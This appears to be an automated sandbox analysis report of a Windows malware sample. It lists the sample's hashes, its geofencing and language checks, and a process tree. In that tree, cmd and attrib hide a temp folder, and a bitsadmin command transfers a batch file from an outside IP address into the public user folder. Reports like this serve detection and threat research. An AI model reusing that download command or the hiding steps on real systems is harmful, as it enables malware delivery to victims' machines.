Analysis
-
max time kernel
125s -
max time network
131s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
06-08-2024 02:12
Static task
static1
Behavioral task
behavioral1
Sample
ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
Resource
win7-20240704-en
General
-
Target
ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
-
Size
126KB
-
MD5
b2dc0f8a36a7e450b11149a8e15ca964
-
SHA1
27fd3d24a969b5b0528b69f1cbd8b293e74a6809
-
SHA256
ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15
-
SHA512
135b14382607e69e38a1e8ff3795233e0636fa29657e154270595b92804973ed96041d223eda9c71e270970df850a72b5f6b869d4b92fd51522bd52be8e8b933
-
SSDEEP
1536:06/2vO9g8CoiedwWRNxDzaoOeJSZHewWXTW6F8huRUTc333VnvwYXDBHEi4nuQr6:d/2vO9g8CNed7XaoO8SZHBX4
Malware Config
Signatures
-
Download via BitsAdmin 1 TTPs 2 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 19 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
cmd.exebitsadmin.exebitsadmin.exebitsadmin.exeattrib.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exeab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.execmd.exebitsadmin.execmd.execmd.execmd.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe -
Suspicious use of WriteProcessMemory 54 IoCs
Processes:
ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4316 wrote to memory of 2400 4316 ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe cmd.exe PID 4316 wrote to memory of 2400 4316 ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe cmd.exe PID 4316 wrote to memory of 2400 4316 ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe cmd.exe PID 2400 wrote to memory of 2132 2400 cmd.exe attrib.exe PID 2400 wrote to memory of 2132 2400 cmd.exe attrib.exe PID 2400 wrote to memory of 2132 2400 cmd.exe attrib.exe PID 2400 wrote to memory of 4640 2400 cmd.exe cmd.exe PID 2400 wrote to memory of 4640 2400 cmd.exe cmd.exe PID 2400 wrote to memory of 4640 2400 cmd.exe cmd.exe PID 4640 wrote to memory of 4020 4640 cmd.exe bitsadmin.exe PID 4640 wrote to memory of 4020 4640 cmd.exe bitsadmin.exe PID 4640 wrote to memory of 4020 4640 cmd.exe bitsadmin.exe PID 2400 wrote to memory of 2596 2400 cmd.exe bitsadmin.exe PID 2400 wrote to memory of 2596 2400 cmd.exe bitsadmin.exe PID 2400 wrote to memory of 2596 2400 cmd.exe bitsadmin.exe PID 2400 wrote to memory of 4988 2400 cmd.exe bitsadmin.exe PID 2400 wrote to memory of 4988 2400 cmd.exe bitsadmin.exe PID 2400 wrote to memory of 4988 2400 cmd.exe bitsadmin.exe PID 2400 wrote to memory of 1756 2400 cmd.exe cmd.exe PID 2400 wrote to memory of 1756 2400 cmd.exe cmd.exe PID 2400 wrote to memory of 1756 2400 cmd.exe cmd.exe PID 1756 wrote to memory of 1812 1756 cmd.exe bitsadmin.exe PID 1756 wrote to memory of 1812 1756 cmd.exe bitsadmin.exe PID 1756 wrote to memory of 1812 1756 cmd.exe bitsadmin.exe PID 2400 wrote to memory of 420 2400 cmd.exe bitsadmin.exe PID 2400 wrote to memory of 420 2400 cmd.exe bitsadmin.exe PID 2400 wrote to memory of 420 2400 cmd.exe bitsadmin.exe PID 2400 wrote to memory of 4456 2400 cmd.exe bitsadmin.exe PID 2400 wrote to memory of 4456 2400 cmd.exe bitsadmin.exe PID 2400 wrote to memory of 4456 2400 cmd.exe bitsadmin.exe PID 2400 wrote to memory of 2524 2400 cmd.exe cmd.exe PID 2400 wrote to memory of 2524 2400 cmd.exe cmd.exe PID 2400 wrote to memory of 2524 2400 cmd.exe cmd.exe PID 2524 wrote to memory of 3996 2524 cmd.exe bitsadmin.exe PID 2524 wrote to memory of 3996 2524 cmd.exe bitsadmin.exe PID 2524 wrote to memory of 3996 2524 cmd.exe bitsadmin.exe PID 2400 wrote to memory of 2912 2400 cmd.exe bitsadmin.exe PID 2400 wrote to memory of 2912 2400 cmd.exe bitsadmin.exe PID 2400 wrote to memory of 2912 2400 cmd.exe bitsadmin.exe PID 2400 wrote to memory of 2956 2400 cmd.exe bitsadmin.exe PID 2400 wrote to memory of 2956 2400 cmd.exe bitsadmin.exe PID 2400 wrote to memory of 2956 2400 cmd.exe bitsadmin.exe PID 2400 wrote to memory of 1928 2400 cmd.exe cmd.exe PID 2400 wrote to memory of 1928 2400 cmd.exe cmd.exe PID 2400 wrote to memory of 1928 2400 cmd.exe cmd.exe PID 1928 wrote to memory of 2640 1928 cmd.exe bitsadmin.exe PID 1928 wrote to memory of 2640 1928 cmd.exe bitsadmin.exe PID 1928 wrote to memory of 2640 1928 cmd.exe bitsadmin.exe PID 2400 wrote to memory of 4332 2400 cmd.exe bitsadmin.exe PID 2400 wrote to memory of 4332 2400 cmd.exe bitsadmin.exe PID 2400 wrote to memory of 4332 2400 cmd.exe bitsadmin.exe PID 2400 wrote to memory of 3596 2400 cmd.exe bitsadmin.exe PID 2400 wrote to memory of 3596 2400 cmd.exe bitsadmin.exe PID 2400 wrote to memory of 3596 2400 cmd.exe bitsadmin.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe"C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4316 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\t14845.bat" "C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\SysWOW64\attrib.exeattrib +h C:\Users\Admin\AppData\Local\Temp\ytmp3⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2132 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c ""Bitsadmin3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Windows\SysWOW64\bitsadmin.exeBitsadmin4⤵
- System Location Discovery: System Language Discovery
PID:4020 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin3⤵
- System Location Discovery: System Language Discovery
PID:2596 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /crEaTe pls3⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:4988 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c ""Bitsadmin3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\SysWOW64\bitsadmin.exeBitsadmin4⤵
- System Location Discovery: System Language Discovery
PID:1812 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin3⤵
- System Location Discovery: System Language Discovery
PID:420 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /ResUme pls3⤵
- System Location Discovery: System Language Discovery
PID:4456 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c ""Bitsadmin3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\SysWOW64\bitsadmin.exeBitsadmin4⤵
- System Location Discovery: System Language Discovery
PID:3996 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin3⤵
- System Location Discovery: System Language Discovery
PID:2912 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /CompLete pls3⤵
- System Location Discovery: System Language Discovery
PID:2956 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c ""Bitsadmin3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\SysWOW64\bitsadmin.exeBitsadmin4⤵
- System Location Discovery: System Language Discovery
PID:2640 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin3⤵
- System Location Discovery: System Language Discovery
PID:4332 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /TRanSfer pls http:164.90.244.116/run2025.bat C:\Users\Public\run2025.bat3⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:3596
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4328,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=4292 /prefetch:81⤵PID:4580
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d813dcd73594622bd3f1deefd3661175
SHA15fe85bc7dde7c19f166452641d889ff48f70022d
SHA2563d73776fc4c2cd443e448831a16646c779a9f24f2b1c299d9eb41e2f928f445b
SHA512347bef14d9e32f00265c72ef10b8da733a2486ac8567198123f40dbcd953cb1dd6dc171bbea2c3aae270c8eafe112ec9913186f23cb91ef29c74f37d7946aa80